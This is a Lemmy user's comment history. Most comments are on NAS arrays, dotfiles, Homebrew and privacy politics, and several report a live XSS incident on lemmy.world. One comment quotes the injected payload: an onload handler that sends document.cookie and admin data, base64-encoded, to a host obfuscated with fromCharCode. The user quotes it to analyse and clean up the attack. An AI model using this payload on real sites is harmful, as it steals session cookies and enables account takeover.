Skip Navigation

Posts
6
Comments
294
Joined
2 yr. ago

  • I’d like you to meet my new friend SkyNet.

  • Thanks for this. Someone else has mentioned this a while back and I completely forgot what it was called. Which is ironic given what the acronym stands for. I’ll give it a second look.

  • Not shocking. It’s not a huge market and there’s a lot more competition than there was even just a couple of years ago. Cost of entry has plummeted.

  • That repair time is the bear. Particularly as so many consumer grade NAS device really don’t have the horsepower for it. System works great until you have to rebuild an array. When that time comes don’t plan on doing much of anything while it’s grinding for the next few days.

  • Stow is good and I’d recommend it for someone starting out. By the time I found about it I had already written a silly amount of code from scratch to accomplish effectively the same thing.

  • Obviously Ubuntu wants to push Ubuntu but this is a fair take. Notably, outside of iOS/macOS development, a vast majority of enterprise developers that do use macOS are going to leverage the GNU tools, typically via Homebrew. So while they may not be using LINUX itself, the tools and user experience are all the same.

    Even Apple leverages Homebrew for package management and advertises to its devs.

  • I have fond memories of seeing movies with my father in the theatre. I'm often left to think... hmmm... That was not so appropriate. Alien & Animal House rise to the top of the list.

  • My entire .dotfiles is in GitHub. Anything I want to keep common across machines is stored there and either inserted in PATH or symlinked as needed.

  • Which is why I find the whole banning TikTok concept absurd.

    It’s picking one easy scapegoat company to rally around, completely ignores the thousands upon thousands of other applications that collect data on us.

    It’s not security, it’s security theater. It’s lazy and designed to distract us. It’s to keep us from not asking questions about any company’s practices that might hurt someone politically or financially.

    We don’t need to ban TikTok. We need to ban Tik Tok and thousands of others like it. We need to have real conversations and put forth real solutions with regards to privacy, globally. It won’t happen though. Because it’s going to cost somebody money.

  • Technically, all of them. Your home instance will be the most accurate because it'll have the most complete data about you but each instance you have federated contact with will end up keeping track. I honestly haven't pulled apart the code to see how it all comes together but I suspect that may be a reason why they don't surface the data in the UI, lack of consistency.

  • And one server can host multiple instances 👍

  • Waiting on patches to propagate to the container registries.

  • The interface for TOTP need to be greatly improved as well. I made sure that I had two browsers logged in when I did it because the flow is so hinky. Not having a confirmation process was a bit nerve racking.

  • Disagree on database level access. The token stealing code that transmits back to its mothership was injected through comments. I’ve already identified the ones that were propagated to my own instance.

  • Yeah... Their traffic is federating again so things are playing catchup.

  • That post is two hours old and posted to TelAviv, of all places. I'm not so much trusting on that.

  • I restored a database snapshot from a couple hours ago. That jives with what I'm seeing.

  • The actually full comment code that I can see in the database is quite disquieting, cookie stealing:

    onload="fetch(String.fromCharCode(104,116,116,112,115, 58,47,47,122,101,108,101,110,115,107,121,46,122,105,112,47,115,97,118,101,47) +btoa(document.cookie+(document.getElementById(String.fromCharCode(110,97,118,65,100,109,105,110))

  • Not sure if it's actually XSS. Lemmy.world did have an admin account compromise so it could've been done locally.

    It actually looks like it may be being propagated via comments. I received more than a handful from lemmy.world and it appears they were in the process of deleting them before they went dark. I nuked the remaining ones by hand but you can see that lemmy.blahaj.zone still has the same few remaining... https://lemmy.blahaj.zone/search?q=onload%3D&type=All&listingType=All&page=1&sort=TopAll